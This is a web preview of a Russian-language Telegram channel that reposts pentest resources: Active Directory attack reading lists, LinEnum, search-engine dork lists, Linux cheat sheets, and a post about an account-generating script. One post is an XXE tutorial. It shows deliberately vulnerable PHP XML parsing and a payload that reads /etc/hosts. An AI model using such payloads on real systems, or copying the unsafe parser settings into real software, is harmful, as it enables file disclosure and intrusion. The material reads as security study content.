TGViewer
Channel Public Channel
Sleepless Book

Sleepless Book

@asleep_book

Subscribers
274
Photos
125
Videos
0
Links
163
Recent Posts 20 shown
Post #428 300

Forwarded from S.E.Book

Нашел очень объемную и актуальную подборку полезных ресурсов на тему управления уязвимостями. Все ресурсы аккуратно отсортированы по разделам, включая всевозможные агрегаторы трендовых и обсуждаемых уязвимостей, базы данных, реестры и бюллетени. Добавляйте в закладки:

➡️ https://start.me/p/n74opD/cve-vm-by-alexredsec

#CVE
Post #427 362

Forwarded from Life-Hack - Хакер

LinEnum

#Linux #pentest #полезное

Сбор всей информации о системе для выявления потенциальных векторов повышения привилегий в Linux. Все проверки собраны в одни Bash скрипт не требующий дополнительных зависимостей.

Ссылка на GitHub

LH | News | OSINT | AI
Post #423 1.28K

Forwarded from S.E.Book

👨‍💻 Пентест Active Directory.

• С момента создания службы каталогов Active Directory (AD) прошло уже 25 лет. За это время служба обросла функционалом, протоколами и различными клиентами.

• Материал, который Вы найдете по ссылкам ниже, станет хорошей отправной точкой для изучения особенностей и слабых мест AD. Содержание следующее:

- Trees and Forests / Components;
- Enumerating AD with Bloodhound;
- Authentication, Authorization, Access Control and more;
- Enumeration;
- LLMNR Poisoning;
- Lateral movement & privilege escalation;
- Domain persistence and cross forest attacks.

• Вот ещё очень хороший цикл статей "Active Directory in Red Teaming" — включает в себя описание различных инструментов, основ и нюансов при проведении тестирования на проникновение в AD:

- Introduction;
- Offensive PowerShell;
- Local Privilege Escalation;
- Lateral Movement;
- Domain Persistence;
- Domain Privilege Escalation;
- Forest Trust Abuse.

• Дополнительно:

- DetectionLab — проект, который позволит тебе развернуть виртуальную лабораторию на базе Windows, для использования в исследовательских целях.
- Vulnerable-AD — заведомо уязвимая Active Directory. Окажется полезной для практических занятий и тестов.
- Cheat Sheet AD — эта шпаргалка описывает определенные методы, которые используются для атак Windows Active Directory.

#Пентест #AD
Post #422 898
XEE
Код страницы содержит код уязвимый к атакам. libxml_disable_entity_loader(false) позволяет загружать внешние объекты. simplexml_load_string с LIBXML_NOENT позволяет веб-приложению получать доступ к внутренним файлам системы.
<?php
..
...
libxml_disable_entity_loader(false);
$wishlist = simplexml_load_string($xml_data, "SimpleXMLElement", LIBXML_NOENT);

...
..
echo "Item added to your wishlist successfully.";
?>


Внешний объект ссылается на данные из внешнего файла или ресурса. В следующем коде сущность &ext; может ссылаться на внешний файл, расположенный по адресу " http://eval.com/robots.txt", который будет загружен в XML:
<!DOCTYPE people [
<!ENTITY ext SYSTEM "http://tryhackme.com/robots.txt">
]>


Изначальный XML-запрос:
<wishlist>
<user_id>1</user_id>
<item>
<product_id>1</product_id>
</item>
</wishlist>


Запрос с добавлением полезной нагрузки:
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>
Post #420 729
Автоматизация Dorks запросов через внешние сервисы
1. Dorks Tool: "https://dorks.faisalahmed.me"
2. Bug Bounty SE: "https://nitinyadav00.github.io/Bug-Bounty-Search-Engine"
3. Google Dorks BBT: "https://taksec.github.io/google-dorks-bug-bounty"

- DuckDuckGo
1. Операторы: "https://duckduckgo.com/duckduckgo-help-pages/results/syntax/"

- Yandex
1. Операторы: "https://hackware.ru/?p=6045"

- GitHub Dorks
1. Скрипт: "https://github.com/techgaun/github-dorks"
2. Операнды: "https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets"

- Shoodan Dorks
1. Операнды: "https://github.com/lothos612/shodan"
Post #419 717

Forwarded from S.E.Book

👩‍💻 ++ 101 Linux commands.

• Объемная книга (CheatSheet) для изучения командной строки Linux. Материал пригодиться не только начинающим, но и опытным пользователям Linux. Содержание следующее:

Basics;
- File Hierarchy Standard (FHS);
- Commands;
Disk and File System Management;
- General Disk Manipulation (non-LVM);
- Globs (Wildcards);
- Regex;
- Stream redirection;
Text Readers & Editors;
- Less;
- VI;
User and Group Management;
File System Permissions;
SSH;
Cronjobs;
Package Management;
- RPM;
- YUM;
List of commands by category:
- Directory Navigation;
- File Commands;
- File and Directory Manipulation;
- Package archive and compression tools;
- System commands;
- Networking Commands;
- Package Management;
- User Information commands;
- Session commands;
- Getting Help;
- Applications.

#Linux
Post #418 655

Forwarded from XATORI 👾

main.py911 B
создайте папку
с текстовим доком accounts.txt
И поместите файл main.py туда же
и запускайте
Готовые акки будут в txt файле

Запуск python main.py
Post #416 646

Forwarded from Okita

sysctl net.ipv4.ip_default_ttl
Post #415 665

Forwarded from Okita

sudo sysctl -w net.ipv4.ip_default_ttl=NEW_TTL_VALUE
Post #411 653

Forwarded from darkside

list.txt16.3 KB
79 tools (C#) for working in Active Directory.

File contents:
Github link & description.

#pentest #activedirectory
Older posts →

About this channel

How can I read @asleep_book without a Telegram account?
TGViewer shows the public web preview Telegram publishes for Sleepless Book: recent posts, photos, videos and the subscriber count, with no app, login or account.
How many subscribers does Sleepless Book have?
Sleepless Book (@asleep_book) has 274 subscribers on Telegram, refreshed roughly every 30 minutes.
Does Sleepless Book know I viewed it here?
No. Public channel previews carry no viewer identity, and TGViewer has no accounts or tracking of what you look up.
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →